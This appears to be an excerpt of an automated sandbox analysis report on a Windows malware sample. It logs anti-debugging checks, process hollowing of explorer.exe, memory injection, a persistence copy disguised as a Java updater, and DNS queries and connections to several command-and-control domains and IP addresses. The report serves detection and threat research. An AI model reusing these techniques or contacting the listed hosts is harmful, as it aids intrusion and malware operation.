Source: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe	Process queried: DebugPort	Jump to behavior
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Process queried: DebugPort	Jump to behavior
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe	Process queried: DebugPort	Jump to behavior
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Process queried: DebugPort	Jump to behavior
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Process queried: DebugPort	Jump to behavior
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Process queried: DebugPort
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe

Code function: 0_2_02450F5A LdrInitializeThunk,

0_2_02450F5A

Source: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe

Code function: 0_2_0046A91D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_0046A91D

Source: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe	Code function: 0_2_004015C6 mov eax, dword ptr fs:[00000030h]	0_2_004015C6
Source: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe	Code function: 0_2_004015C6 mov eax, dword ptr fs:[00000030h]	0_2_004015C6
Source: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe	Code function: 0_2_00401BC1 mov eax, dword ptr fs:[00000030h]	0_2_00401BC1
Source: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe	Code function: 0_2_00600000 mov eax, dword ptr fs:[00000030h]	0_2_00600000
Source: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe	Code function: 0_2_00600000 mov ecx, dword ptr fs:[00000030h]	0_2_00600000
Source: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe	Code function: 0_2_00600408 mov eax, dword ptr fs:[00000030h]	0_2_00600408
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Code function: 22_2_004015C6 mov eax, dword ptr fs:[00000030h]	22_2_004015C6
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Code function: 22_2_004015C6 mov eax, dword ptr fs:[00000030h]	22_2_004015C6
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Code function: 22_2_00401BC1 mov eax, dword ptr fs:[00000030h]	22_2_00401BC1
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Code function: 22_2_02140000 mov eax, dword ptr fs:[00000030h]	22_2_02140000
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Code function: 22_2_02140000 mov ebx, dword ptr fs:[00000030h]	22_2_02140000
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Code function: 22_2_021406A7 mov eax, dword ptr fs:[00000030h]	22_2_021406A7
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Code function: 22_2_021406A7 mov ecx, dword ptr fs:[00000030h]	22_2_021406A7
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Code function: 22_2_02140AAF mov eax, dword ptr fs:[00000030h]	22_2_02140AAF
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Code function: 22_2_021F0000 mov eax, dword ptr fs:[00000030h]	22_2_021F0000
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Code function: 22_2_021F0000 mov ecx, dword ptr fs:[00000030h]	22_2_021F0000
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Code function: 22_2_021F0408 mov eax, dword ptr fs:[00000030h]	22_2_021F0408
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Code function: 24_2_00510000 mov eax, dword ptr fs:[00000030h]	24_2_00510000
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Code function: 24_2_00510000 mov ecx, dword ptr fs:[00000030h]	24_2_00510000
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Code function: 24_2_00510408 mov eax, dword ptr fs:[00000030h]	24_2_00510408

Source: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe

Code function: 0_2_00465700 _memset,_memset,_memset,GetProcessHeap,PulseEvent,GetCommandLineA,RtlAllocateHeap,

0_2_00465700

Source: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe	Code function: 0_2_004015C6 EntryPoint,SetErrorMode,SetUnhandledExceptionFilter,GetModuleFileNameW,WaitForSingleObjectEx,ExitProcess,	0_2_004015C6
Source: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe	Code function: 0_2_0046A91D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0046A91D
Source: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe	Code function: 0_2_0046BA29 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0046BA29
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Code function: 22_2_004015C6 EntryPoint,SetErrorMode,SetUnhandledExceptionFilter,GetModuleFileNameW,WaitForSingleObjectEx,ExitProcess,	22_2_004015C6
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Code function: 22_2_0046A91D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	22_2_0046A91D
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Code function: 22_2_0046BA29 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	22_2_0046BA29
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Code function: 24_2_0046A91D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	24_2_0046A91D
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Code function: 24_2_0046BA29 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	24_2_0046BA29

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\SysWOW64\explorer.exe	Domain query: xircus.ws
Source: C:\Windows\SysWOW64\explorer.exe	Domain query: mockupery.ru
Source: C:\Windows\SysWOW64\explorer.exe	Domain query: flamable.ru
Source: C:\Windows\SysWOW64\explorer.exe	Domain query: firecrackers.ru
Source: C:\Windows\SysWOW64\explorer.exe	Domain query: blobbb.ru
Source: C:\Windows\SysWOW64\explorer.exe	Domain query: xircus.org.ru
Source: C:\Windows\SysWOW64\explorer.exe	Domain query: cooperal.ru
Source: C:\Windows\SysWOW64\explorer.exe	Network Connect: 64.70.19.203 80	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Domain query: ghostlyy.ru
Source: C:\Windows\SysWOW64\explorer.exe	Domain query: crustbuster.ru
Source: C:\Windows\SysWOW64\explorer.exe	Network Connect: 91.234.34.80 187	Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe	Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe	Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: unknown target: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: unknown target: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: unknown target: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: unknown target: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: unknown target: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: unknown target: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: unknown target: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: unknown target: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: unknown target: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: unknown target: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: unknown target: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe protection: execute and read and write	Jump to behavior

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe

Section unmapped: C:\Windows\SysWOW64\explorer.exe base address: 50000

Jump to behavior

Writes to foreign memory regions

Show sources

Source: C:\Windows\SysWOW64\explorer.exe	Memory written: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe base: 16633EF	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Memory written: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe base: 77E377F0	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Memory written: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe base: 18833EF	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Memory written: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe base: 77E377F0	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Memory written: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe base: 1F033EF	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Memory written: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe base: 77E377F0	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Memory written: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe base: 1D533EF	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Memory written: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe base: 77E377F0	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Memory written: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe base: 1AF33EF	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Memory written: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe base: 77E377F0	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Memory written: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe base: 1AD33EF	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Memory written: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe base: 77E377F0	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Memory written: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe base: 17733EF	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Memory written: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe base: 77E377F0	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Memory written: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe base: 11A33EF	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Memory written: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe base: 77E377F0	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Memory written: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe base: 16833EF	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Memory written: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe base: 77E377F0	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Memory written: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe base: 17233EF	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Memory written: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe base: 77E377F0	Jump to behavior

Source: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe

Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe

Jump to behavior

Source: 144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe, 00000000.00000002.310516074.0000000002380000.00000040.00000001.sdmp, explorer.exe, 0000000B.00000000.307839801.0000000002C00000.00000040.00000001.sdmp, gGRiqYglIOLbY.exe, 0000000E.00000002.730793060.0000000001180000.00000040.00000001.sdmp, gGRiqYglIOLbY.exe, 00000010.00000002.731030721.0000000001570000.00000040.00000001.sdmp, gGRiqYglIOLbY.exe, 00000014.00000000.334771420.0000000001790000.00000040.00000001.sdmp, gGRiqYglIOLbY.exe, 00000015.00000002.731567574.0000000001E10000.00000040.00000001.sdmp, 935aa375omok5c.exe, 00000016.00000002.365278502.00000000024C0000.00000040.00000001.sdmp, gGRiqYglIOLbY.exe, 00000017.00000002.731117696.0000000001C60000.00000040.00000001.sdmp, 935aa375omok5c.exe, 00000018.00000002.481759587.0000000002340000.00000040.00000001.sdmp, gGRiqYglIOLbY.exe, 00000019.00000000.478865388.0000000001A00000.00000040.00000001.sdmp, 935aa375omok5c.exe, 0000001A.00000002.481247538.00000000023A0000.00000040.00000001.sdmp, 935aa375omok5c.exe, 0000001C.00000002.695383351.00000000022B0000.00000040.00000001.sdmp, gGRiqYglIOLbY.exe, 00000020.00000000.490508386.00000000019E0000.00000040.00000001.sdmp, gGRiqYglIOLbY.exe, 00000021.00000000.504465423.0000000001680000.00000040.00000001.sdmp, gGRiqYglIOLbY.exe, 00000022.00000000.513443887.00000000010B0000.00000040.00000001.sdmp, gGRiqYglIOLbY.exe, 00000023.00000002.731423528.0000000001590000.00000040.00000001.sdmp, gGRiqYglIOLbY.exe, 00000024.00000002.731169906.0000000001630000.00000040.00000001.sdmp	Binary or memory string: DownloadVersionListSoftware\Microsoft\Internet Explorer\VersionManager%LOCALAPPDATA%\Microsoft\Internet Explorer\VersionManager\versionlist.xml11.0Shell_TrayWnd%s\%sNT AUTHORITYSYSTEM\mscoree.dllrunasopenCreateProcessInternalWntdll.dll/%sSOFTWARE\Microsoft\NET Framework Setup\NDP ,, jarfile\shell\open\commandSYSTEM\CurrentControlSetZwMapUserPhysicalPagesScatterZwWow64CallFunction64ZwWaitHighEventPairbf'J&';qyy4RpaTqqg\{szPmBbf'J&';qyy4RpaTqqg\{szBfsvJzf;qyy4Fsv\fS\|ypEgzapvapqzyp&';qyy4F]Vgptap\apxSgzxEtgf\|{r[txp{vglea;qyy4FfyP{vgleaEtv~pafpv`g&';qyy4P{vgleaXpfftrpb\|{ag`fa;qyy4B\|{Cpg\|slAg`fa{pate\|&';qyy4[pa@fpgRpa\{sz`gyxz{;qyy4@GYQzb{yztqAzS\|ypB`gyxz{;qyy4Zwat\|{@fpgTrp{aFag\|{rvzxvay&';qyy4Atf~Q\|tyzr\{q\|gpvatqcte\|&';qyy4VgptapEgzvpffB\|a}Az~p{B`fpg&';qyy4V}t{rpB\|{qzbXpfftrpS\|yapg~pg{py&';qyy4@eqtapEgzvA}gptqTaag\|w`ap~pg{py&';qyy4\{\|a\|ty\|opEgzvA}gptqTaag\|w`apY\|fa~pg{py&';qyy4VgptapEgzvpff\{apg{tyB~pg{py&';qyy4RpaA}gptq\q~pg{py&';qyy4RpaXteepqS\|yp[txpB~pg{py&';qyy4RpaEgzq`va\{sz{aqyy;qyy4GayD`pglPypcta\|z{Sytrf{aqyy;qyy4bvffag{aqyy;qyy4xpxvel{aqyy;qyy4xpxfpa{aqyy;qyy4GayFpaP{c\|gz{xp{aCtg\|twyp{aqyy;qyy4GayD`pglP{c\|gz{xp{aCtg\|twypJ@{aqyy;qyy4GayD`pglP{c\|gz{xp{aCtg\|twyp{aqyy;qyy4GayFpaP{c\|gz{xp{aCtg{aqyy;qyy4QwrWgpt~Ez\|{a{aqyy;qyy4Qwr@\|RpaA}gptqQpw`rZw
Source: explorer.exe, 0000000B.00000002.740316598.00000000031D0000.00000002.00000001.sdmp, gGRiqYglIOLbY.exe, 0000000E.00000000.318067822.0000000001920000.00000002.00000001.sdmp, gGRiqYglIOLbY.exe, 00000010.00000000.326784032.0000000001D00000.00000002.00000001.sdmp, gGRiqYglIOLbY.exe, 00000014.00000000.330902679.0000000001F20000.00000002.00000001.sdmp, gGRiqYglIOLbY.exe, 00000015.00000000.339654559.00000000025A0000.00000002.00000001.sdmp, gGRiqYglIOLbY.exe, 00000017.00000002.732045218.0000000002260000.00000002.00000001.sdmp, gGRiqYglIOLbY.exe, 00000019.00000002.734614841.0000000002190000.00000002.00000001.sdmp, gGRiqYglIOLbY.exe, 00000020.00000000.491976980.0000000002170000.00000002.00000001.sdmp, gGRiqYglIOLbY.exe, 00000021.00000000.502824229.0000000001E10000.00000002.00000001.sdmp, gGRiqYglIOLbY.exe, 00000022.00000000.517511111.0000000001840000.00000002.00000001.sdmp, gGRiqYglIOLbY.exe, 00000023.00000000.526391772.0000000001D20000.00000002.00000001.sdmp, gGRiqYglIOLbY.exe, 00000024.00000002.732919039.0000000001DC0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: gGRiqYglIOLbY.exe, 935aa375omok5c.exe, gGRiqYglIOLbY.exe, 00000019.00000002.734614841.0000000002190000.00000002.00000001.sdmp, gGRiqYglIOLbY.exe, 00000020.00000000.491976980.0000000002170000.00000002.00000001.sdmp, gGRiqYglIOLbY.exe, 00000021.00000000.502824229.0000000001E10000.00000002.00000001.sdmp, gGRiqYglIOLbY.exe, 00000022.00000000.517511111.0000000001840000.00000002.00000001.sdmp, gGRiqYglIOLbY.exe, 00000023.00000000.526391772.0000000001D20000.00000002.00000001.sdmp, gGRiqYglIOLbY.exe, 00000024.00000002.732919039.0000000001DC0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000B.00000002.740316598.00000000031D0000.00000002.00000001.sdmp, gGRiqYglIOLbY.exe, 0000000E.00000000.318067822.0000000001920000.00000002.00000001.sdmp, gGRiqYglIOLbY.exe, 00000010.00000000.326784032.0000000001D00000.00000002.00000001.sdmp, gGRiqYglIOLbY.exe, 00000014.00000000.330902679.0000000001F20000.00000002.00000001.sdmp, gGRiqYglIOLbY.exe, 00000015.00000000.339654559.00000000025A0000.00000002.00000001.sdmp, gGRiqYglIOLbY.exe, 00000017.00000002.732045218.0000000002260000.00000002.00000001.sdmp, gGRiqYglIOLbY.exe, 00000019.00000002.734614841.0000000002190000.00000002.00000001.sdmp, gGRiqYglIOLbY.exe, 00000020.00000000.491976980.0000000002170000.00000002.00000001.sdmp, gGRiqYglIOLbY.exe, 00000021.00000000.502824229.0000000001E10000.00000002.00000001.sdmp, gGRiqYglIOLbY.exe, 00000022.00000000.517511111.0000000001840000.00000002.00000001.sdmp, gGRiqYglIOLbY.exe, 00000023.00000000.526391772.0000000001D20000.00000002.00000001.sdmp, gGRiqYglIOLbY.exe, 00000024.00000002.732919039.0000000001DC0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 0000000B.00000002.740316598.00000000031D0000.00000002.00000001.sdmp, gGRiqYglIOLbY.exe, 0000000E.00000000.318067822.0000000001920000.00000002.00000001.sdmp, gGRiqYglIOLbY.exe, 00000010.00000000.326784032.0000000001D00000.00000002.00000001.sdmp, gGRiqYglIOLbY.exe, 00000014.00000000.330902679.0000000001F20000.00000002.00000001.sdmp, gGRiqYglIOLbY.exe, 00000015.00000000.339654559.00000000025A0000.00000002.00000001.sdmp, gGRiqYglIOLbY.exe, 00000017.00000002.732045218.0000000002260000.00000002.00000001.sdmp, gGRiqYglIOLbY.exe, 00000019.00000002.734614841.0000000002190000.00000002.00000001.sdmp, gGRiqYglIOLbY.exe, 00000020.00000000.491976980.0000000002170000.00000002.00000001.sdmp, gGRiqYglIOLbY.exe, 00000021.00000000.502824229.0000000001E10000.00000002.00000001.sdmp, gGRiqYglIOLbY.exe, 00000022.00000000.517511111.0000000001840000.00000002.00000001.sdmp, gGRiqYglIOLbY.exe, 00000023.00000000.526391772.0000000001D20000.00000002.00000001.sdmp, gGRiqYglIOLbY.exe, 00000024.00000002.732919039.0000000001DC0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe

Code function: 0_2_0046F200 cpuid

0_2_0046F200

Source: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe	Code function: GetLocaleInfoA,	0_2_004777E7
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Code function: GetLocaleInfoA,	22_2_004777E7
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Code function: GetLocaleInfoA,	24_2_004777E7

Source: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Source: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductId	Jump to behavior
Source: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductId	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductId	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductId	Jump to behavior
